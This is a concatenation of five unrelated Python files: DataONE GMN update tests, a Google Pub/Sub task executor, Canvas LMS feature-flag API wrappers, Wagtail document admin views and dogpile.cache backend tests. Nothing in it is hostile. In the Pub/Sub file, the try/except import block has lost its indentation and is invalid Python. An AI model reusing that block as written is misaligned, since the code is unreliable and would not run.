            with d1_test.d1_test_case.reproducible_random_context():
                pid_create, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
                    gmn_client_v1_v2, sid=True
                )
                self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
                # Obsoleted object has a create and an update event
                log = gmn_client_v1_v2.getLogRecords(pidFilter=pid_create)
                self.sample.assert_equals(log, "update_records_event", gmn_client_v1_v2)
    @responses.activate
    def test_1070(self, gmn_client_v1_v2):
        """update() correctly adjusts sysmeta on obsoleted object."""
        with d1_gmn.tests.gmn_mock.disable_auth():
            with d1_test.d1_test_case.reproducible_random_context():
                pid_create, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
                    gmn_client_v1_v2, sid=True
                )
                sysmeta_before_update_pyxb = gmn_client_v1_v2.getSystemMetadata(
                    pid_create
                )
                # Make sure that datetime.now() changes between create() and update().
                time.sleep(0.2)
                self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
                sysmeta_after_update_pyxb = gmn_client_v1_v2.getSystemMetadata(
                    pid_create
                )
                # dateSysMetadataModified is updated on obsoleted object
                # dateUploaded remains unchanged on obsoleted object
                self.sample.assert_equals(
                    sysmeta_before_update_pyxb,
                    "update_adjusts_obsoleted_obj_before",
                    gmn_client_v1_v2,
                )
                self.sample.assert_equals(
                    sysmeta_after_update_pyxb,
                    "update_adjusts_obsoleted_obj_after",
                    gmn_client_v1_v2,
                )
    @responses.activate
    def test_1080(self, gmn_client_v1_v2):
        """MNStorage.update(): Obsoleted object raises InvalidRequest."""
        with d1_gmn.tests.gmn_mock.disable_auth():
            pid_create, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
                gmn_client_v1_v2, sid=True
            )
            # First update obsoletes pid_create; a second update must fail.
            self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
            with pytest.raises(d1_common.types.exceptions.InvalidRequest):
                self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
    @responses.activate
    def test_1090(self, gmn_client_v1_v2):
        """MNStorage.update(): Update an object with existing PID raises
        IdentifierNotUnique."""
        with d1_gmn.tests.gmn_mock.disable_auth():
            other_pid, other_sid, other_sciobj_bytes, other_sysmeta_pyxb = self.create_obj(
                gmn_client_v1_v2, sid=True
            )
            old_pid, old_sid, old_sciobj_bytes, old_sysmeta_pyxb = self.create_obj(
                gmn_client_v1_v2, sid=True
            )
            # Reusing other_pid as the new PID must be rejected.
            with pytest.raises(d1_common.types.exceptions.IdentifierNotUnique):
                self.update_obj(gmn_client_v1_v2, old_pid, new_pid=other_pid)
    @responses.activate
    def test_1100(self, gmn_client_v1_v2):
        """MNStorage.update(): Update an object with URL PID not matching SysMeta raises
        InvalidSystemMetadata."""
        with d1_gmn.tests.gmn_mock.disable_auth():
            old_pid, old_sid, old_sciobj_bytes, old_sysmeta_pyxb = self.create_obj(
                gmn_client_v1_v2, sid=True
            )
            pid, sid, sciobj_bytes, sysmeta_pyxb = self.generate_sciobj_with_defaults(
                gmn_client_v1_v2
            )
            # Force a mismatch between the URL PID and the sysmeta identifier.
            sysmeta_pyxb.identifier = (
                d1_test.instance_generator.identifier.generate_pid()
            )
            with pytest.raises(d1_common.types.exceptions.InvalidSystemMetadata):
                gmn_client_v1_v2.update(
                    old_pid, io.BytesIO(sciobj_bytes), pid, sysmeta_pyxb
                )
|
|
#!/usr/bin/env python
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import logging
from subprocess import PIPE, Popen
import sys
import threading
import time
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
from apiclient import discovery
from apiclient.errors import HttpError
import httplib2
from oauth2client.client import GoogleCredentials
log = logging.getLogger(__name__)
PUBSUB_SCOPES = ["https://www.googleapis.com/auth/pubsub"]
class AsynchronousFileReader(threading.Thread):
    '''
    Read a file object line by line on a background thread.

    Each line read from ``fd`` is pushed onto ``queue`` so another thread
    can consume the output without blocking on the pipe.
    '''
    def __init__(self, fd, queue):
        assert isinstance(queue, Queue)
        assert callable(fd.readline)
        threading.Thread.__init__(self)
        self._fd = fd
        self._queue = queue

    def run(self):
        '''Thread body: push every line from the file onto the queue.'''
        while True:
            line = self._fd.readline()
            if line == '':
                # readline() returns '' only at EOF.
                break
            self._queue.put(line)

    def eof(self):
        '''True once the reader thread finished and the queue is drained.'''
        return not self.is_alive() and self._queue.empty()
def get_client():
    """Build and return a Pub/Sub API client authorized with the
    application-default credentials, scoped to PUBSUB_SCOPES."""
    creds = GoogleCredentials.get_application_default()
    creds = creds.create_scoped(PUBSUB_SCOPES)
    http_transport = httplib2.Http()
    creds.authorize(http_transport)
    return discovery.build('pubsub', 'v1beta2', http=http_transport)
class Executor():
    """Pull task messages from a Pub/Sub subscription and execute them.

    Each pulled message triggers ``task_cmd`` in a subprocess. While the
    task runs, the message's ack deadline (lease) is periodically extended;
    the message is acknowledged once the task finishes.
    """

    def __init__(self,
                 topic='mytopic',
                 project='myproject',
                 subname='default_sub',
                 task_cmd="sleep 20",
                 deadline=60):
        self.topic = topic
        self.project = project
        self.subname = "%s_%s" % (topic, subname)
        self.task_cmd = task_cmd
        self.client = get_client()
        self.sub = self.get_subscription(deadline=deadline)
        self.ackdeadline = self.sub['ackDeadlineSeconds']
        self.io_queue = Queue()
        self.lease_start = None
        # Bug fix: initialize the consecutive lease-extension failure
        # counter here. Previously it was first assigned only after a
        # *successful* extend_lease() call, so a 503 on the very first
        # extension attempt raised AttributeError on the `+= 1` below.
        self.extend_error_ct = 0
        self.job_log = logging.getLogger(self.subname)

    def create_subscription(self, deadline=60):
        """Create the pull subscription on self.topic and return it."""
        log.debug("creating subscription")
        body = {
            # The name of the topic from which this subscription receives
            # messages.
            'topic': 'projects/{}/topics/{}'.format(self.project, self.topic),
            'ackDeadlineSeconds': deadline
        }
        try:
            subscription = self.client.projects().subscriptions().create(
                name='projects/{}/subscriptions/{}'.format(self.project,
                                                           self.subname),
                body=body).execute()
        except Exception:
            log.critical("unable to create subscription")
            raise
        return subscription

    def get_subscription(self, deadline=60):
        """Return a fresh subscription, deleting any pre-existing one.

        Subscriptions are a flat namespace in a project; deleting first
        ensures we don't receive messages published before this executor
        started.
        """
        sub = None
        log.debug("getting subscription")
        try:
            self.client.projects().subscriptions().delete(
                subscription='projects/{}/subscriptions/{}'.format(
                    self.project, self.subname)).execute()
            log.debug("deleted existing subscription")
        except HttpError as e:
            if e.resp.status == 404:
                # Nothing to delete; just create it.
                sub = self.create_subscription(deadline=deadline)
            else:
                raise
        else:
            sub = self.create_subscription(deadline=deadline)
        log.debug("subscription %s" % sub)
        return sub

    def get_messages(self):
        """Pull up to one message; return [] when none were received."""
        batch_size = 1
        body = {
            # returnImmediately=False instructs the API to wait to collect
            # up to maxMessages, or until the timeout (approx 90s).
            'returnImmediately': False,
            'maxMessages': batch_size,
        }
        log.debug("pulling messages")
        resp = self.client.projects().subscriptions().pull(
            subscription=self.sub['name'],
            body=body).execute()
        if 'receivedMessages' in resp:
            log.debug("number msgs: %s" % len(resp.get('receivedMessages')))
            # The lease clock starts when the messages are handed to us.
            self.lease_start = datetime.now()
            return resp.get('receivedMessages')
        return []

    def extend_lease(self, msg):
        """Extend msg's ack deadline by self.ackdeadline seconds."""
        body = {
            'ackIds': [msg['ackId']],
            'ackDeadlineSeconds': self.ackdeadline,
        }
        resp = self.client.projects().subscriptions().modifyAckDeadline(
            subscription=self.sub['name'],
            body=body).execute()
        return resp

    def run_task(self, msg):
        """Run task_cmd, streaming its stdout to job_log and renewing the
        message lease while the process runs.

        :param msg: the received message dict (must contain 'ackId')
        :return: the process exit code
        """
        proc = Popen(self.task_cmd, stdout=PIPE, shell=True)
        stdout_reader = AsynchronousFileReader(proc.stdout, self.io_queue)
        stdout_reader.start()
        while not stdout_reader.eof():
            # Drain any buffered output lines without blocking.
            while True:
                try:
                    line = self.io_queue.get_nowait()  # could do timeout=.1
                except Empty:
                    break
                else:
                    self.job_log.info(line)
            lease_age = datetime.now() - self.lease_start
            if lease_age.seconds > (self.ackdeadline - 20):
                # Fewer than ~20 seconds left in the lease; renew it.
                log.debug("extending lease")
                try:
                    self.extend_lease(msg)
                    self.extend_error_ct = 0
                    self.lease_start = datetime.now()
                except HttpError as e:
                    if e.resp.status == 503:
                        # The service may return an intermittent 503;
                        # tolerate a few in a row before giving up.
                        log.warning("PubSub returned 503")
                        self.extend_error_ct += 1
                        if self.extend_error_ct > 5:
                            log.critical(
                                "Too many error responses to extend request")
                            raise
                    else:
                        # Bug fix: non-503 errors were silently swallowed
                        # before; propagate them instead.
                        raise
            time.sleep(1)
            retcode = proc.poll()
            if retcode is not None:
                # Process exited.
                # TODO if error - expire lease immediately?
                log.debug("process ended")
                return retcode

    def process_messages(self, msgs):
        """Run the task for each message, acking each after completion.

        The design runs a single task at a time and acks per message (not
        batched), so a task is only acked after it completes — nothing else
        will extend the lease afterwards.
        """
        for received_message in msgs:
            pubsub_message = received_message.get('message')
            log.debug("processing %s" % received_message.get('ackId'))
            if pubsub_message:
                ack_ids = []
                cmd_retcode = self.run_task(received_message)
                # TODO if cmd_retcode == 0, the cmd exited clean; the retry
                # logic could get complex and is left as an exercise.
                ack_ids.append(received_message.get('ackId'))
                ack_body = {'ackIds': ack_ids}
                if ack_ids:
                    # Acknowledge the message.
                    log.debug("acking %s" % ack_ids)
                    self.client.projects().subscriptions().acknowledge(
                        subscription=self.sub['name'],
                        body=ack_body).execute()

    def watch_topic(self):
        """Poll the subscription forever, processing messages as they come.

        With returnImmediately=False each pull holds an open request for
        roughly 90 seconds, so this loop does not spin.
        """
        while True:
            msgs = self.get_messages()
            if msgs:
                self.process_messages(msgs)
|
|
from canvas_sdk import client, utils
def list_features_courses(request_ctx, course_id, per_page=None, **request_kwargs):
    """
    List all features that apply to a given Account, Course, or User.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param course_id: (required) ID
    :type course_id: string
    :param per_page: (optional) Set how many results canvas should return, defaults to config.LIMIT_PER_PAGE
    :type per_page: integer or None
    :return: List features
    :rtype: requests.Response (with array data)
    """
    # Fall back to the context-wide page size when none was given.
    per_page = request_ctx.per_page if per_page is None else per_page
    url = request_ctx.base_api_url + '/v1/courses/{course_id}/features'.format(
        course_id=course_id)
    return client.get(request_ctx, url, payload={'per_page': per_page},
                      **request_kwargs)
def list_features_accounts(request_ctx, account_id, per_page=None, **request_kwargs):
    """
    List all features that apply to a given Account, Course, or User.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param account_id: (required) ID
    :type account_id: string
    :param per_page: (optional) Set how many results canvas should return, defaults to config.LIMIT_PER_PAGE
    :type per_page: integer or None
    :return: List features
    :rtype: requests.Response (with array data)
    """
    # Fall back to the context-wide page size when none was given.
    per_page = request_ctx.per_page if per_page is None else per_page
    url = request_ctx.base_api_url + '/v1/accounts/{account_id}/features'.format(
        account_id=account_id)
    return client.get(request_ctx, url, payload={'per_page': per_page},
                      **request_kwargs)
def list_features_users(request_ctx, user_id, per_page=None, **request_kwargs):
    """
    List all features that apply to a given Account, Course, or User.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param user_id: (required) ID
    :type user_id: string
    :param per_page: (optional) Set how many results canvas should return, defaults to config.LIMIT_PER_PAGE
    :type per_page: integer or None
    :return: List features
    :rtype: requests.Response (with array data)
    """
    # Fall back to the context-wide page size when none was given.
    per_page = request_ctx.per_page if per_page is None else per_page
    url = request_ctx.base_api_url + '/v1/users/{user_id}/features'.format(
        user_id=user_id)
    return client.get(request_ctx, url, payload={'per_page': per_page},
                      **request_kwargs)
def list_enabled_features_courses(request_ctx, course_id, **request_kwargs):
    """
    List all features that are enabled on a given Account, Course, or User.
    Only the feature names are returned.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param course_id: (required) ID
    :type course_id: string
    :return: List enabled features
    :rtype: requests.Response (with void data)
    """
    url = request_ctx.base_api_url + '/v1/courses/{course_id}/features/enabled'.format(
        course_id=course_id)
    return client.get(request_ctx, url, **request_kwargs)
def list_enabled_features_accounts(request_ctx, account_id, **request_kwargs):
    """
    List all features that are enabled on a given Account, Course, or User.
    Only the feature names are returned.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param account_id: (required) ID
    :type account_id: string
    :return: List enabled features
    :rtype: requests.Response (with void data)
    """
    url = request_ctx.base_api_url + '/v1/accounts/{account_id}/features/enabled'.format(
        account_id=account_id)
    return client.get(request_ctx, url, **request_kwargs)
def list_enabled_features_users(request_ctx, user_id, **request_kwargs):
    """
    List all features that are enabled on a given Account, Course, or User.
    Only the feature names are returned.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param user_id: (required) ID
    :type user_id: string
    :return: List enabled features
    :rtype: requests.Response (with void data)
    """
    url = request_ctx.base_api_url + '/v1/users/{user_id}/features/enabled'.format(
        user_id=user_id)
    return client.get(request_ctx, url, **request_kwargs)
def get_feature_flag_courses(request_ctx, course_id, feature, **request_kwargs):
    """
    Get the feature flag that applies to a given Account, Course, or User.
    The flag may be defined on the object, or it may be inherited from a parent
    account. Check context_id and context_type on the returned object to tell
    which; if those fields are missing, the object is the global Canvas default.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param course_id: (required) ID
    :type course_id: string
    :param feature: (required) ID
    :type feature: string
    :return: Get feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    url = request_ctx.base_api_url + '/v1/courses/{course_id}/features/flags/{feature}'.format(
        course_id=course_id, feature=feature)
    return client.get(request_ctx, url, **request_kwargs)
def get_feature_flag_accounts(request_ctx, account_id, feature, **request_kwargs):
    """
    Get the feature flag that applies to a given Account, Course, or User.
    The flag may be defined on the object, or it may be inherited from a parent
    account. Check context_id and context_type on the returned object to tell
    which; if those fields are missing, the object is the global Canvas default.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param account_id: (required) ID
    :type account_id: string
    :param feature: (required) ID
    :type feature: string
    :return: Get feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    url = request_ctx.base_api_url + '/v1/accounts/{account_id}/features/flags/{feature}'.format(
        account_id=account_id, feature=feature)
    return client.get(request_ctx, url, **request_kwargs)
def get_feature_flag_users(request_ctx, user_id, feature, **request_kwargs):
    """
    Get the feature flag that applies to a given Account, Course, or User.
    The flag may be defined on the object, or it may be inherited from a parent
    account. Check context_id and context_type on the returned object to tell
    which; if those fields are missing, the object is the global Canvas default.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param user_id: (required) ID
    :type user_id: string
    :param feature: (required) ID
    :type feature: string
    :return: Get feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    url = request_ctx.base_api_url + '/v1/users/{user_id}/features/flags/{feature}'.format(
        user_id=user_id, feature=feature)
    return client.get(request_ctx, url, **request_kwargs)
def set_feature_flag_courses(request_ctx, course_id, feature, state=None, locking_account_id=None, **request_kwargs):
    """
    Set a feature flag for a given Account, Course, or User. This call will fail if a parent account sets
    a feature flag for the same feature in any state other than "allowed".

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param course_id: (required) ID
    :type course_id: string
    :param feature: (required) ID
    :type feature: string
    :param state: (optional) "off":: feature unavailable. "allowed":: (accounts only) off here but may be enabled below. "on":: unconditionally on.
    :type state: string or None
    :param locking_account_id: (optional) If set, this FeatureFlag may only be modified by someone with administrative rights in the specified account. The locking account must be above the target object in the account chain.
    :type locking_account_id: integer or None
    :return: Set feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    # Reject unknown states up front, matching the API's accepted values.
    utils.validate_attr_is_acceptable(state, ('off', 'allowed', 'on'))
    url = request_ctx.base_api_url + '/v1/courses/{course_id}/features/flags/{feature}'.format(
        course_id=course_id, feature=feature)
    return client.put(request_ctx, url,
                      payload={'state': state,
                               'locking_account_id': locking_account_id},
                      **request_kwargs)
def set_feature_flag_accounts(request_ctx, account_id, feature, state=None, locking_account_id=None, **request_kwargs):
    """
    Set a feature flag for a given Account, Course, or User. This call will fail if a parent account sets
    a feature flag for the same feature in any state other than "allowed".

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param account_id: (required) ID
    :type account_id: string
    :param feature: (required) ID
    :type feature: string
    :param state: (optional) "off":: feature unavailable. "allowed":: (accounts only) off here but may be enabled below. "on":: unconditionally on.
    :type state: string or None
    :param locking_account_id: (optional) If set, this FeatureFlag may only be modified by someone with administrative rights in the specified account. The locking account must be above the target object in the account chain.
    :type locking_account_id: integer or None
    :return: Set feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    # Reject unknown states up front, matching the API's accepted values.
    utils.validate_attr_is_acceptable(state, ('off', 'allowed', 'on'))
    url = request_ctx.base_api_url + '/v1/accounts/{account_id}/features/flags/{feature}'.format(
        account_id=account_id, feature=feature)
    return client.put(request_ctx, url,
                      payload={'state': state,
                               'locking_account_id': locking_account_id},
                      **request_kwargs)
def set_feature_flag_users(request_ctx, user_id, feature, state=None, locking_account_id=None, **request_kwargs):
    """
    Set a feature flag for a given Account, Course, or User. This call will fail if a parent account sets
    a feature flag for the same feature in any state other than "allowed".

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param user_id: (required) ID
    :type user_id: string
    :param feature: (required) ID
    :type feature: string
    :param state: (optional) "off":: feature unavailable. "allowed":: (accounts only) off here but may be enabled below. "on":: unconditionally on.
    :type state: string or None
    :param locking_account_id: (optional) If set, this FeatureFlag may only be modified by someone with administrative rights in the specified account. The locking account must be above the target object in the account chain.
    :type locking_account_id: integer or None
    :return: Set feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    # Reject unknown states up front, matching the API's accepted values.
    utils.validate_attr_is_acceptable(state, ('off', 'allowed', 'on'))
    url = request_ctx.base_api_url + '/v1/users/{user_id}/features/flags/{feature}'.format(
        user_id=user_id, feature=feature)
    return client.put(request_ctx, url,
                      payload={'state': state,
                               'locking_account_id': locking_account_id},
                      **request_kwargs)
def remove_feature_flag_courses(request_ctx, course_id, feature, **request_kwargs):
    """
    Delete the feature flag set directly on a course. The course then
    inherits the flag from higher in the account chain; if this flag was
    'on' or 'off', any lower-level flags it masked take effect again.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param course_id: (required) ID
    :type course_id: string
    :param feature: (required) ID
    :type feature: string
    :return: Remove feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    path = '/v1/courses/{course_id}/features/flags/{feature}'.format(
        course_id=course_id, feature=feature)
    return client.delete(request_ctx, request_ctx.base_api_url + path,
                         **request_kwargs)
def remove_feature_flag_accounts(request_ctx, account_id, feature, **request_kwargs):
    """
    Delete the feature flag set directly on an account. The account then
    inherits the flag from higher in the account chain; if this flag was
    'on' or 'off', any lower-level flags it masked take effect again.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param account_id: (required) ID
    :type account_id: string
    :param feature: (required) ID
    :type feature: string
    :return: Remove feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    path = '/v1/accounts/{account_id}/features/flags/{feature}'.format(
        account_id=account_id, feature=feature)
    return client.delete(request_ctx, request_ctx.base_api_url + path,
                         **request_kwargs)
def remove_feature_flag_users(request_ctx, user_id, feature, **request_kwargs):
    """
    Delete the feature flag set directly on a user. The user then
    inherits the flag from higher in the account chain; if this flag was
    'on' or 'off', any lower-level flags it masked take effect again.

    :param request_ctx: The request context
    :type request_ctx: :class:RequestContext
    :param user_id: (required) ID
    :type user_id: string
    :param feature: (required) ID
    :type feature: string
    :return: Remove feature flag
    :rtype: requests.Response (with FeatureFlag data)
    """
    path = '/v1/users/{user_id}/features/flags/{feature}'.format(
        user_id=user_id, feature=feature)
    return client.delete(request_ctx, request_ctx.base_api_url + path,
                         **request_kwargs)
|
|
import os
from django.core.exceptions import PermissionDenied
from django.core.paginator import Paginator
from django.shortcuts import get_object_or_404, redirect
from django.template.response import TemplateResponse
from django.urls import reverse
from django.utils.translation import gettext as _
from django.views.decorators.vary import vary_on_headers
from wagtail.admin import messages
from wagtail.admin.auth import PermissionPolicyChecker
from wagtail.admin.forms.search import SearchForm
from wagtail.admin.models import popular_tags_for_model
from wagtail.core.models import Collection
from wagtail.documents import get_document_model
from wagtail.documents.forms import get_document_form
from wagtail.documents.permissions import permission_policy
from wagtail.search import index as search_index
# Decorator factory enforcing the documents permission policy on views below.
permission_checker = PermissionPolicyChecker(permission_policy)
@permission_checker.require_any('add', 'change', 'delete')
@vary_on_headers('X-Requested-With')
def index(request):
    """Document listing view.

    Supports ordering, collection filtering, full-text search and
    pagination; AJAX requests get only the results partial so the
    listing can be refreshed in place.
    """
    Document = get_document_model()
    # Get documents (filtered by user permission)
    documents = permission_policy.instances_user_has_any_permission_for(
        request.user, ['change', 'delete']
    )
    # Ordering: only the two whitelisted values are honoured; anything
    # else silently falls back to newest-first.
    if 'ordering' in request.GET and request.GET['ordering'] in ['title', '-created_at']:
        ordering = request.GET['ordering']
    else:
        ordering = '-created_at'
    documents = documents.order_by(ordering)
    # Filter by collection; invalid or unknown ids are ignored.
    current_collection = None
    collection_id = request.GET.get('collection_id')
    if collection_id:
        try:
            current_collection = Collection.objects.get(id=collection_id)
            documents = documents.filter(collection=current_collection)
        except (ValueError, Collection.DoesNotExist):
            pass
    # Search
    query_string = None
    if 'q' in request.GET:
        form = SearchForm(request.GET, placeholder=_("Search documents"))
        if form.is_valid():
            query_string = form.cleaned_data['q']
            documents = documents.search(query_string)
    else:
        form = SearchForm(placeholder=_("Search documents"))
    # Pagination
    paginator = Paginator(documents, per_page=20)
    documents = paginator.get_page(request.GET.get('p'))
    collections = permission_policy.collections_user_has_any_permission_for(
        request.user, ['add', 'change']
    )
    # Hide the collection chooser when the user has no real choice.
    if len(collections) < 2:
        collections = None
    # Create response
    # NOTE(review): request.is_ajax() is deprecated as of Django 3.1 --
    # confirm the Django version this project pins still provides it.
    if request.is_ajax():
        return TemplateResponse(request, 'wagtaildocs/documents/results.html', {
            'ordering': ordering,
            'documents': documents,
            'query_string': query_string,
            'is_searching': bool(query_string),
        })
    else:
        return TemplateResponse(request, 'wagtaildocs/documents/index.html', {
            'ordering': ordering,
            'documents': documents,
            'query_string': query_string,
            'is_searching': bool(query_string),
            'search_form': form,
            'popular_tags': popular_tags_for_model(Document),
            'user_can_add': permission_policy.user_has_permission(request.user, 'add'),
            'collections': collections,
            'current_collection': current_collection,
        })
@permission_checker.require('add')
def add(request):
    """Render and process the "add document" form.

    GET shows an empty form; a valid POST records the uploaded file's
    size and content hash, saves the document, reindexes it for search
    and redirects back to the listing.
    """
    Document = get_document_model()
    DocumentForm = get_document_form(Document)

    if request.method != 'POST':
        form = DocumentForm(user=request.user)
        return TemplateResponse(request, "wagtaildocs/documents/add.html", {
            'form': form,
        })

    doc = Document(uploaded_by_user=request.user)
    form = DocumentForm(request.POST, request.FILES, instance=doc, user=request.user)
    if not form.is_valid():
        messages.error(request, _("The document could not be saved due to errors."))
        return TemplateResponse(request, "wagtaildocs/documents/add.html", {
            'form': form,
        })

    # Record the uploaded file's size and content hash, rewinding the
    # stream so the subsequent save reads it from the start.
    doc.file_size = doc.file.size
    doc.file.seek(0)
    doc._set_file_hash(doc.file.read())
    doc.file.seek(0)
    form.save()

    # Reindex the document to make sure all tags are indexed.
    search_index.insert_or_update_object(doc)

    messages.success(request, _("Document '{0}' added.").format(doc.title), buttons=[
        messages.button(reverse('wagtaildocs:edit', args=(doc.id,)), _('Edit'))
    ])
    return redirect('wagtaildocs:index')
@permission_checker.require('change')
def edit(request, document_id):
    """Render and process the "edit document" form.

    When the file itself is replaced, the new file's size/hash are
    recorded and the previous file is removed from storage after the
    save succeeds.
    """
    Document = get_document_model()
    DocumentForm = get_document_form(Document)
    doc = get_object_or_404(Document, id=document_id)
    # Per-instance permission check on top of the decorator's coarse one.
    if not permission_policy.user_has_permission_for_instance(request.user, 'change', doc):
        raise PermissionDenied
    if request.method == 'POST':
        # Keep a handle on the current file so it can be deleted from
        # storage if the form replaces it.
        original_file = doc.file
        form = DocumentForm(request.POST, request.FILES, instance=doc, user=request.user)
        if form.is_valid():
            if 'file' in form.changed_data:
                doc = form.save(commit=False)
                doc.file_size = doc.file.size
                # Set new document file hash
                doc.file.seek(0)
                doc._set_file_hash(doc.file.read())
                doc.file.seek(0)
                doc.save()
                form.save_m2m()
                # If providing a new document file, delete the old one.
                # NB Doing this via original_file.delete() clears the file field,
                # which definitely isn't what we want...
                original_file.storage.delete(original_file.name)
            else:
                doc = form.save()
            # Reindex the document to make sure all tags are indexed
            search_index.insert_or_update_object(doc)
            messages.success(request, _("Document '{0}' updated").format(doc.title), buttons=[
                messages.button(reverse('wagtaildocs:edit', args=(doc.id,)), _('Edit'))
            ])
            return redirect('wagtaildocs:index')
        else:
            messages.error(request, _("The document could not be saved due to errors."))
    else:
        form = DocumentForm(instance=doc, user=request.user)
    try:
        local_path = doc.file.path
    except NotImplementedError:
        # Document is hosted externally (eg, S3)
        local_path = None
    if local_path:
        # Give error if document file doesn't exist
        if not os.path.isfile(local_path):
            messages.error(
                request,
                _("The file could not be found. Please change the source or delete the document"),
                buttons=[messages.button(reverse('wagtaildocs:delete', args=(doc.id,)), _('Delete'))]
            )
    return TemplateResponse(request, "wagtaildocs/documents/edit.html", {
        'document': doc,
        'filesize': doc.get_file_size(),
        'form': form,
        'user_can_delete': permission_policy.user_has_permission_for_instance(
            request.user, 'delete', doc
        ),
    })
@permission_checker.require('delete')
def delete(request, document_id):
    """Confirm (GET) and perform (POST) deletion of one document."""
    Document = get_document_model()
    doc = get_object_or_404(Document, id=document_id)

    allowed = permission_policy.user_has_permission_for_instance(
        request.user, 'delete', doc)
    if not allowed:
        raise PermissionDenied

    if request.method != 'POST':
        # First visit: ask for confirmation.
        return TemplateResponse(request, "wagtaildocs/documents/confirm_delete.html", {
            'document': doc,
        })

    doc.delete()
    messages.success(request, _("Document '{0}' deleted.").format(doc.title))
    return redirect('wagtaildocs:index')
def usage(request, document_id):
    """Paginated listing of the objects that reference this document."""
    Document = get_document_model()
    doc = get_object_or_404(Document, id=document_id)

    pages = Paginator(doc.get_usage(), per_page=20)
    used_by = pages.get_page(request.GET.get('p'))

    context = {
        'document': doc,
        'used_by': used_by
    }
    return TemplateResponse(request, "wagtaildocs/documents/usage.html", context)
|
|
from dogpile.cache.api import CacheBackend, CachedValue, NO_VALUE
from dogpile.cache import register_backend, CacheRegion, util
from dogpile.cache.region import _backend_loader
from . import eq_, assert_raises_message
import itertools
import time
from nose import SkipTest
from threading import Thread, Lock
from dogpile.cache.compat import thread
from unittest import TestCase
import random
import collections
class _GenericBackendFixture(object):
    """Shared fixture for backend test classes.

    Subclasses set ``backend`` (an entrypoint name) plus optional
    ``region_args`` / ``config_args``; the fixture provides helpers to
    build a configured CacheRegion or a raw backend, and deletes every
    touched key in tearDown.
    """
    @classmethod
    def setup_class(cls):
        # Instantiate a throwaway backend just to prove the backend is
        # importable and reachable; otherwise skip the whole class.
        try:
            backend_cls = _backend_loader.load(cls.backend)
            backend = backend_cls(cls.config_args.get('arguments', {}))
        except ImportError:
            raise SkipTest("Backend %s not installed" % cls.backend)
        cls._check_backend_available(backend)

    def tearDown(self):
        # Remove every key recorded by the key-mangler wrapper, or the
        # single well-known key used by raw-backend tests.
        if self._region_inst:
            for key in self._keys:
                self._region_inst.delete(key)
            self._keys.clear()
        elif self._backend_inst:
            self._backend_inst.delete("some_key")

    @classmethod
    def _check_backend_available(cls, backend):
        # Hook for subclasses to probe connectivity; no check by default.
        pass

    # Per-class defaults; subclasses may override.
    region_args = {}
    config_args = {}
    _region_inst = None
    _backend_inst = None
    # NOTE(review): class-level mutable set -- shared by all instances and
    # subclasses; tearDown clears it after every test, so this works as
    # long as tests do not run concurrently within one process.
    _keys = set()

    def _region(self, backend=None, region_args={}, config_args={}):
        # NOTE(review): mutable default arguments -- harmless here only
        # because they are read, never mutated.
        _region_args = self.region_args.copy()
        _region_args.update(**region_args)
        _config_args = self.config_args.copy()
        _config_args.update(config_args)

        def _store_keys(key):
            # Chain any pre-existing key mangler, then record the final
            # (mangled) key so tearDown can delete it from the backend.
            if existing_key_mangler:
                key = existing_key_mangler(key)
            self._keys.add(key)
            return key
        self._region_inst = reg = CacheRegion(**_region_args)
        existing_key_mangler = self._region_inst.key_mangler
        self._region_inst.key_mangler = _store_keys
        reg.configure(backend or self.backend, **_config_args)
        return reg

    def _backend(self):
        # Build (and remember, for tearDown) a raw backend instance.
        backend_cls = _backend_loader.load(self.backend)
        _config_args = self.config_args.copy()
        self._backend_inst = backend_cls(_config_args.get('arguments', {}))
        return self._backend_inst
class _GenericBackendTest(_GenericBackendFixture, TestCase):
    """Black-box conformance tests run against any backend entrypoint.

    Exercises the raw backend API (get/set/delete), the CacheRegion API
    (single and multi-key), expiration, dogpile locking under threads,
    and the argument-caching decorator.
    """

    def test_backend_get_nothing(self):
        backend = self._backend()
        eq_(backend.get("some_key"), NO_VALUE)

    def test_backend_delete_nothing(self):
        # Deleting an absent key must not raise.
        backend = self._backend()
        backend.delete("some_key")

    def test_backend_set_get_value(self):
        backend = self._backend()
        backend.set("some_key", "some value")
        eq_(backend.get("some_key"), "some value")

    def test_backend_delete(self):
        backend = self._backend()
        backend.set("some_key", "some value")
        backend.delete("some_key")
        eq_(backend.get("some_key"), NO_VALUE)

